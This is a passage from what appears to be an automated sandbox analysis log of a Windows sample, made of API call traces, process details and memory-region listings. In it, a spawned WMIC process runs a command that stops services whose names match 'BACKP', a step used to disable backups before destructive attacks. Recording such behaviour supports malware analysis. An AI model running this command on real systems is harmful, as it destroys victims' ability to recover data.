_MaxCount=0x7) returned -13 [0109.352] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0109.353] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0109.353] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0109.353] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0109.353] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0109.353] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0109.353] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0109.353] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0109.353] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0109.353] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0109.353] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0109.353] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0109.353] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0109.353] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0109.353] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0109.353] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0109.353] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0109.353] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0109.353] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0109.353] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0109.353] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0109.353] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0109.353] lstrcmpW (lpString1="\\WMIC.exe", lpString2="\\XCOPY.EXE") returned -1 [0109.354] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\Wbem\\WMIC.exe", lpCommandLine="WMIC SERVICE WHERE 'caption LIKE '%BACKP%'' CALL STOPSERVICE", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x465efc0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="WMIC SERVICE WHERE 'caption LIKE '%BACKP%'' CALL STOPSERVICE", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x465f00c | out: lpCommandLine="WMIC SERVICE WHERE 'caption LIKE '%BACKP%'' CALL STOPSERVICE", lpProcessInformation=0x465f00c*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xdc0, dwThreadId=0xdc4)) returned 1 [0109.360] CloseHandle (hObject=0xa4) returned 1 [0109.360] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0109.360] GetEnvironmentStringsW () returned 0x47a9f38* [0109.360] FreeEnvironmentStringsA (penv="=") returned 1 [0109.360] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0110.180] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x465efa4 | out: lpExitCode=0x465efa4*=0x0) returned 1 [0110.180] CloseHandle (hObject=0xa8) returned 1 [0110.180] _vsnwprintf (in: _Buffer=0x465f08c, _BufferCount=0x13, _Format="%08X", _ArgList=0x465efac | out: _Buffer="00000000") returned 8 [0110.180] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0110.180] GetEnvironmentStringsW () returned 0x47ab428* [0110.180] FreeEnvironmentStringsA (penv="=") returned 1 [0110.180] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0110.181] GetEnvironmentStringsW () returned 0x47ab428* [0110.181] FreeEnvironmentStringsA (penv="=") returned 1 [0110.181] DeleteProcThreadAttributeList (in: lpAttributeList=0x465f038 | out: lpAttributeList=0x465f038) [0110.181] _get_osfhandle (_FileHandle=1) returned 0x3c [0110.181] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0110.181] _get_osfhandle (_FileHandle=1) returned 0x3c [0110.181] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0110.181] _get_osfhandle (_FileHandle=0) returned 0x38 [0110.181] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0110.181] SetConsoleInputExeNameW () returned 0x1 [0110.181] GetConsoleOutputCP () returned 0x1b5 [0110.182] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0110.182] SetThreadUILanguage (LangId=0x0) returned 0x409 [0110.182] exit (_Code=0) Thread: id = 196 os_tid = 0xdbc Process: id = "38" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x43cf1000" os_pid = "0xda8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "37" os_parent_pid = "0xda0" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2491 start_va = 0x7f8f6000 end_va = 0x7f8f6fff entry_point = 0x0 region_type = private name = "private_0x000000007f8f6000" filename = "" Region: id = 2492 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2493 start_va = 0xc39a20000 end_va = 0xc39a3ffff entry_point = 0x0 region_type = private name = "private_0x0000000c39a20000" filename = "" Region: id = 2494 start_va = 0xc39a40000 end_va = 0xc39a53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000c39a40000" filename = "" Region: id = 2495 start_va = 0xc39a60000 end_va = 0xc39a9ffff entry_point = 0x0 region_type = private name = "private_0x0000000c39a60000" filename = "" Region: id = 2496 start_va = 0x7df5ff9e0000 end_va = 0x7ff5ff9dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff9e0000" filename = "" Region: id = 2497 start_va = 0x7ff6c3bb0000 end_va = 0x7ff6c3bd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3bb0000" filename = "" Region: id = 2498 start_va = 0x7ff6c3bd8000 end_va = 0x7ff6c3bd8fff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3bd8000" filename = "" Region: id = 2499 start_va = 0x7ff6c3bde000 end_va = 0x7ff6c3bdffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3bde000" filename = "" Region: id = 2500 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 2501 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2502 start_va = 0xc39c50000 end_va = 0xc39d4ffff entry_point = 0x0 region_type = private name = "private_0x0000000c39c50000" filename = "" Region: id = 2503 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2504 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2505 start_va = 0xc39a20000 end_va = 0xc39a2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000c39a20000" filename = "" Region: id = 2506 start_va = 0xc39a30000 end_va = 0xc39a36fff entry_point = 0x0 region_type = private name = "private_0x0000000c39a30000" filename = "" Region: id = 2507 start_va = 0xc39aa0000 end_va = 0xc39b5dfff entry_point = 0xc39aa0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2508 start_va = 0xc39b60000 end_va = 0xc39b9ffff entry_point = 0x0 region_type = private name = "private_0x0000000c39b60000" filename = "" Region: id = 2509 start_va = 0xc39ba0000 end_va = 0xc39ba0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000c39ba0000" filename = "" Region: id = 2510 start_va = 0xc39bb0000 end_va = 0xc39bb6fff entry_point = 0x0 region_type = private name = "private_0x0000000c39bb0000" filename = "" Region: id = 2511 start_va = 0xc39bc0000 end_va = 0xc39bc0fff entry_point = 0x0 region_type = private name = "private_0x0000000c39bc0000" filename = "" Region: id = 2512 start_va = 0xc39bd0000 end_va = 0xc39bd0fff entry_point = 0x0 region_type = private name = "private_0x0000000c39bd0000" filename = "" Region: id = 2513 start_va = 0xc39d50000 end_va = 0xc39ed7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000c39d50000" filename = "" Region: id = 2514 start_va = 0xc39f20000 end_va = 0xc39f2ffff entry_point = 0x0 region_type = private name = "private_0x0000000c39f20000" filename = "" Region: id = 2515 start_va = 0xc39f30000 end_va = 0xc3a0b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000c39f30000" filename = "" Region: id = 2516 start_va = 0xc3a0c0000 end_va = 0xc3b4bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000c3a0c0000" filename = "" Region: id = 2517 start_va = 0x7ff6c3ab0000 end_va = 0x7ff6c3baffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3ab0000" filename = "" Region: id = 2518 start_va = 0x7ff6c3bdc000 end_va = 0x7ff6c3bddfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3bdc000" filename = "" Region: id = 2519 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 2520 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2521 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2522 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2523 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2524 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2525 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2526 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2527 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2528 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2529 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2530 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Thread: id = 193 os_tid = 0xdac Thread: id = 194 os_tid = 0xdb0 Thread: id = 195 os_tid = 0xdb4 Process: id = "39" image_name = "wmic.exe" filename = "c:\\windows\\syswow64\\wbem\\wmic.exe" page_root = "0x1c26f000" os_pid = "0xdc0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "37" os_parent_pid = "0xda0" cmd_line = "WMIC SERVICE WHERE 'caption LIKE '%BACKP%'' CALL STOPSERVICE" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2544 start_va = 0xa60000 end_va = 0xa7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a60000" filename = "" Region: id = 2545 start_va = 0xa80000 end_va = 0xa81fff entry_point = 0x0 region_type = private name = "private_0x0000000000a80000" filename = "" Region: id = 2546 start_va = 0xa90000 end_va = 0xaa3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a90000" filename = "" Region: id = 2547 start_va = 0xab0000 end_va = 0xaeffff entry_point = 0x0 region_type = private name = "private_0x0000000000ab0000" filename = "" Region: id = 2548 start_va = 0xaf0000 end_va = 0xb2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000af0000" filename = "" Region: id = 2549 start_va = 0xb30000 end_va = 0xb33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b30000" filename = "" Region: id = 2550 start_va = 0xb40000 end_va = 0xb40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b40000" filename = "" Region: id = 2551 start_va = 0xb50000 end_va = 0xb51fff entry_point = 0x0 region_type = private name = "private_0x0000000000b50000" filename = "" Region: id = 2552 start_va = 0x1300000 end_va = 0x1363fff entry_point = 0x1300000 region_type = mapped_file name = "wmic.exe" filename = "\\Windows\\SysWOW64\\wbem\\WMIC.exe" (normalized: "c:\\windows\\syswow64\\wbem\\wmic.exe") Region: id = 2553 start_va = 0x1370000 end_va = 0x536ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001370000" filename = "" Region: id = 2554 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2555 start_va = 0x7e0f0000 end_va = 0x7e112fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e0f0000" filename = "" Region: id = 2556 start_va = 0x7e114000 end_va = 0x7e114fff entry_point = 0x0 region_type = private name = "private_0x000000007e114000" filename = "" Region: id = 2557 start_va = 0x7e11a000 end_va = 0x7e11cfff entry_point = 0x0 region_type = private name = "private_0x000000007e11a000" filename = "" Region: id = 2558 start_va = 0x7e11d000 end_va = 0x7e11dfff entry_point = 0x0 region_type = private name = "private_0x000000007e11d000" filename = "" Region: id = 2559 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2560 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2561 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 2562 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2563 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 2564 start_va = 0xcb0000 end_va = 0xcbffff entry_point = 0x0 region_type = private name = "private_0x0000000000cb0000" filename = "" Region: id = 2565 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2566 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2567 start_va = 0xb80000 end_va = 0xc7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b80000" filename = "" Region: id = 2568 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2569 start_va = 0xa60000 end_va = 0xa6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a60000" filename = "" Region: id = 2570 start_va = 0xa70000 end_va = 0xa73fff entry_point = 0x0 region_type = private name = "private_0x0000000000a70000" filename = "" Region: id = 2571 start_va = 0xca0000 end_va = 0xcaffff entry_point = 0x0 region_type = private name = "private_0x0000000000ca0000" filename = "" Region: id = 2572 start_va = 0xcc0000 end_va = 0xd7dfff entry_point = 0xcc0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2573 start_va = 0xd80000 end_va = 0xdbffff entry_point = 0x0 region_type = private name = "private_0x0000000000d80000" filename = "" Region: id = 2574 start_va = 0xdc0000 end_va = 0xdfffff entry_point = 0x0 region_type = private name = "private_0x0000000000dc0000" filename = "" Region: id = 2575 start_va = 0x74a30000 end_va = 0x74a6efff entry_point = 0x74a30000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 2576 start_va = 0x74b60000 end_va = 0x74b67fff entry_point = 0x74b60000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 2577 start_va = 0x74b70000 end_va = 0x74b9ffff entry_point = 0x74b70000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 2578 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2579 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2580 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2581 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2582 start_va = 0x77090000 end_va = 0x77249fff entry_point = 0x77090000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 2583 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2584 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2585 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2586 start_va = 0x77ad0000 end_va = 0x77ad6fff entry_point = 0x77ad0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 2587 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2588 start_va = 0x7dff0000 end_va = 0x7e0effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007dff0000" filename = "" Region: id = 2589 start_va = 0x7e117000 end_va = 0x7e119fff entry_point = 0x0 region_type = private name = "private_0x000000007e117000" filename = "" Region: id = 2590 start_va = 0x76f60000 end_va = 0x76f6bfff entry_point = 0x76f60000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 2591 start_va = 0xa80000 end_va = 0xa80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a80000" filename = "" Region: id = 2592 start_va = 0x77760000 end_va = 0x777e1fff entry_point = 0x77760000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 2593 start_va = 0xb60000 end_va = 0xb60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b60000" filename = "" Region: id = 2594 start_va = 0x74a20000 end_va = 0x74a2cfff entry_point = 0x74a20000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 2595 start_va = 0x77930000 end_va = 0x7798bfff entry_point = 0x77930000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 2596 start_va = 0x749b0000 end_va = 0x74a15fff entry_point = 0x749b0000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 2597 start_va = 0x74af0000 end_va = 0x74b0afff entry_point = 0x74af0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 2598 start_va = 0xe00000 end_va = 0x1136fff entry_point = 0xe00000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2599 start_va = 0x77ba0000 end_va = 0x77c31fff entry_point = 0x77ba0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 2600 start_va = 0x1140000 end_va = 0x1228fff entry_point = 0x1140000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 2601 start_va = 0xb70000 end_va = 0xb73fff entry_point = 0x0 region_type = private name = "private_0x0000000000b70000" filename = "" Region: id = 2602 start_va = 0x74820000 end_va = 0x749affff entry_point = 0x74820000 region_type = mapped_file name = "msxml3.dll" filename = "\\Windows\\SysWOW64\\msxml3.dll" (normalized: "c:\\windows\\syswow64\\msxml3.dll") Region: id = 2603 start_va = 0xc80000 end_va = 0xc9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c80000" filename = "" Region: id = 2604 start_va = 0x1140000 end_va = 0x12fffff entry_point = 0x0 region_type = private name = "private_0x0000000001140000" filename = "" Region: id = 2605 start_va = 0x1140000 end_va = 0x12affff entry_point = 0x0 region_type = private name = "private_0x0000000001140000" filename = "" Region: id = 2606 start_va = 0x12f0000 end_va = 0x12fffff entry_point = 0x0 region_type = private name = "private_0x00000000012f0000" filename = "" Region: id = 2607 start_va = 0x5370000 end_va = 0x555ffff entry_point = 0x0 region_type = private name = "private_0x0000000005370000" filename = "" Region: id = 2608 start_va = 0x1140000 end_va = 0x123ffff entry_point = 0x0 region_type = private name = "private_0x0000000001140000" filename = "" Region: id = 2609 start_va = 0x12a0000 end_va = 0x12affff entry_point = 0x0 region_type = private name = "private_0x00000000012a0000" filename = "" Region: id = 2610 start_va = 0x1140000 end_va = 0x121efff entry_point = 0x1140000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 2611 start_va = 0x1230000 end_va = 0x123ffff entry_point = 0x0 region_type = private name = "private_0x0000000001230000" filename = "" Region: id = 2612 start_va = 0x5560000 end_va = 0x595ffff entry_point = 0x0 region_type = private name = "private_0x0000000005560000" filename = "" Region: id = 2613 start_va = 0xc80000 end_va = 0xc80fff entry_point = 0xc80000 region_type = mapped_file name = "msxml3r.dll" filename = "\\Windows\\SysWOW64\\msxml3r.dll" (normalized: "c:\\windows\\syswow64\\msxml3r.dll") Region: id = 2614 start_va = 0xc90000 end_va = 0xc9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c90000" filename = "" Region: id = 2615 start_va = 0x1240000 end_va = 0x125ffff entry_point = 0x0 region_type = private name = "private_0x0000000001240000" filename = "" Region: id = 2616 start_va = 0x746c0000 end_va = 0x7481ffff entry_point = 0x746c0000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 2617 start_va = 0x77990000 end_va = 0x77a0afff entry_point = 0x77990000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 2618 start_va = 0x778a0000 end_va = 0x7792cfff entry_point = 0x778a0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 2619 start_va 